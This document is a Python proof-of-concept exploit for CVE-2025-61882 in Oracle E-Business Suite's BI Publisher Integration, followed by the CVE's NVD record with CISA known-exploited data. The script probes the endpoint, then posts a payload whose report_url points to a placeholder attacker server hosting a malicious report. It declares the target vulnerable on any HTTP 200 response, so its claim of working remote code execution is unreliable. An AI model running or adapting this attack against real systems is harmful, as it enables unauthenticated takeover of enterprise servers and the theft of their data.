CVE-2025-61882

# CVE-2025-61882 - Oracle E-Business Suite BI Publisher Integration RCE PoC # Affected: Oracle E-Business Suite 12.2.3 - 12.2.14 # Component: BI Publisher Integration (Oracle Concurrent Processing) # WARNING: For authorized security testing only import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-ebs.example.com" # BI Publisher Integration endpoint commonly exposed in Oracle EBS VULNERABLE_PATH = "/OA_HTML/BIPublisherIntegration" def exploit(target): """ Exploit CVE-2025-61882 - Unauthenticated RCE via BI Publisher Integration The vulnerability allows unauthenticated network access via HTTP to compromise Oracle Concurrent Processing. """ headers = { "User-Agent": "Mozilla/5.0 (compatible; OracleEBS-Exploit)", "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*" } # Malicious payload targeting the BI Publisher Integration component # The injection point is in the report processing parameters payload = { "report_url": "http://attacker-server/malicious_report.rtf", "output_format": "PDF", "_csrf": "", "_eventId": "", "_session": "" } try: # Step 1: Probe the vulnerable endpoint probe_url = f"{target}{VULNERABLE_PATH}/faces/Service" resp = requests.get(probe_url, headers=headers, timeout=10, verify=False) print(f"[*] Probe response: {resp.status_code}") # Step 2: Send the exploit payload exploit_url = f"{target}{VULNERABLE_PATH}/reportService" resp = requests.post(exploit_url, data=payload, headers=headers, timeout=10, verify=False) print(f"[*] Exploit response: {resp.status_code}") if resp.status_code == 200: print("[+] Target appears vulnerable to CVE-2025-61882") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-61882 PoC - Oracle EBS BI Publisher Integration RCE") exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-61882", "sourceIdentifier": "[email protected]", "published": "2025-10-05T04:15:40.340", "lastModified": "2025-10-27T17:08:52.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-10-06", "cisaActionDue": "2025-10-27", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Oracle E-Business Suite Unspecified Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:concurrent_processing:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "AD6FCD78-CA2D-4594-A5FA-EDD501044E9F"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/alert-cve-2025-61882.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://blogs.oracle.com/security/post/apply-july-2025-cpu", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61882", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}, {"url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Press/Media Coverage"]}]}}